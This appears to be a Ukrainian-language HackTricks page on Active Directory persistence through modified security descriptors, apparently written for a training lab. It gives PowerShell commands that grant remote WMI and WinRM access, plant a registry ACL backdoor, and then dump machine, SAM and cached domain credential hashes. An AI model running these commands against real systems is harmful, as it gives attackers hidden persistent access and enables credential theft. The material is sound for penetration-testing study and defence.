Security Descriptors

Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)!

Інші способи підтримки HackTricks:

Дескриптори безпеки

З документації: Мова визначення дескриптора безпеки (SDDL) визначає формат, який використовується для опису дескриптора безпеки. SDDL використовує рядки ACE для DACL та SACL: ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid;

Дескриптори безпеки використовуються для зберігання дозволів, які має об'єкт над об'єктом. Якщо ви просто зробите невелику зміну в дескрипторі безпеки об'єкта, ви можете отримати дуже цікаві привілеї над цим об'єктом, не будучи членом привілейованої групи.

Отже, цей метод постійності базується на можливості отримати всі необхідні привілеї щодо певних об'єктів, щоб мати можливість виконати завдання, яке зазвичай вимагає прав адміністратора, але без необхідності бути адміністратором.

Доступ до WMI

Ви можете надати користувачу доступ до віддаленого виконання WMI використовуючи це:

Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc –namespace 'root\cimv2' -Verbose
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc–namespace 'root\cimv2' -Remove -Verbose #Remove

Доступ до WinRM

Надайте доступ до консолі PS winrm користувачеві використовуючи це:

Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Verbose
Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Remove #Remove

Віддалений доступ до хешів

Отримайте доступ до реєстру та витягніть хеші, створивши задній прохідний реєстр за допомогою DAMP, щоб в будь-який момент отримати хеш комп'ютера, SAM та будь-які кешовані облікові дані AD на комп'ютері. Таким чином, дуже корисно надати цей дозвіл звичайному користувачу проти комп'ютера контролера домену:

# allows for the remote retrieval of a system's machine and local account hashes, as well as its domain cached credentials.
Add-RemoteRegBackdoor -ComputerName <remotehost> -Trustee student1 -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local machine account hash for the specified machine.
Get-RemoteMachineAccountHash -ComputerName <remotehost> -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local SAM account hashes for the specified machine.
Get-RemoteLocalAccountHash -ComputerName <remotehost> -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the domain cached credentials for the specified machine.
Get-RemoteCachedCredential -ComputerName <remotehost> -Verbose

Перевірте Срібні квитки, щоб дізнатися, як ви можете використовувати хеш облікового запису комп'ютера контролера домену.

Last updated